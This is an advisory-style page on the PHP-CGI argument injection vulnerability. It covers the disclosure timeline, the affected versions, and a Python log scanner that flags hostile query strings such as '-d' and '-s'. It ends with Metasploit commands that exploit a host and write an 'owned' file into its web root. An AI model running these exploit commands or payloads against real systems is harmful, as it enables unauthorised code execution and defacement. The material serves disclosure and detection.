Timeline :
Vulnerability discovered at Nullcon Hackim 2012 by eindbazen on 2012-01-13
Vulnerability reported to the vendor on 2012-01-17
Vulnerability accidentally disclosed on the PHP bug tracking system on 2012-05-03
Coordinated public release of the vulnerability on 2012-05-03
Metasploit PoC provided on 2012-05-04
PoC provided by :
egypt
hdm
Reference(s) :
Affected version(s) :
PHP versions before 5.3.12
PHP versions before 5.4.2
Tested on CentOS release 6.2 (Final) with :
php-common and php-cli 5.3.3-3.el6_2.6 at Fri Feb 3 00:35:09 2012
Description :
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to argument injection. This Metasploit module takes advantage of the -d flag to set php.ini directives and achieve code execution. From the advisory: “if there is NO unescaped ‘=’ in the query string, the string is split on ‘+’ (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the “encoded in a system-defined manner” from the RFC) and then passes them to the CGI binary.”
Note : This vulnerability was potentially exploited in the wild for at least 8 years!
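The quirk quoted from the advisory (no unescaped ‘=’ in the query string, split on ‘+’, urldecode, hand the pieces to the CGI binary as arguments) is exactly what a defender can replay over web server access logs to spot requests that would have reached php-cgi as command-line options. The following is an added example, not code from the page or from Metasploit; it assumes Apache combined log format and uses constructed sample lines. Note the third sample: an encoded ‘%3d’ is not an unescaped ‘=’, so the request still takes the argv path, which is why the check must run on the raw query string before decoding.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [03/May/2012:12:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [03/May/2012:12:00:02 +0000] "GET /phpinfo.php?-s HTTP/1.1" 200 8192 "-" "curl/7.19"
10.0.0.7 - - [03/May/2012:12:00:03 +0000] "GET /phpinfo.php?-d+max_execution_time%3d30 HTTP/1.1" 200 1024 "-" "python-requests"
10.0.0.8 - - [03/May/2012:12:00:04 +0000] "GET /search.php?q=foo+bar HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)


def cgi_argv_tokens(query):
    """Replay the pre-fix handling described in the advisory: a query string
    with no unescaped '=' is split on '+' and each piece is urldecoded to
    become one argv element for the CGI binary. Returns [] when the query
    would not reach argv at all (it contains a literal '=')."""
    if query == "" or "=" in query:
        return []
    # unquote() (not unquote_plus) keeps '+' out of the picture; we split first.
    return [unquote(part) for part in query.split("+")]


def is_suspicious(target):
    """True if the request target would hand php-cgi at least one option-looking
    argument (a decoded token beginning with '-', e.g. -d or %2dd)."""
    _path, _sep, query = target.partition("?")
    return any(tok.startswith("-") for tok in cgi_argv_tokens(query))


def scan_log(text):
    """Return (client_ip, request_target) for every line that trips the check."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_suspicious(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"{ip} {target}")
```

The same decoded-token check, applied at the web server before the request is dispatched to php-cgi, is the shape of the rewrite-rule mitigation that was circulated for unpatched hosts; the real fix is upgrading to the versions listed above.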
Commands :
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.178.210
set TARGETURI /phpinfo.php
set PAYLOAD php/exec
set CMD echo \"owned\">/var/www/html/owned.html
exploit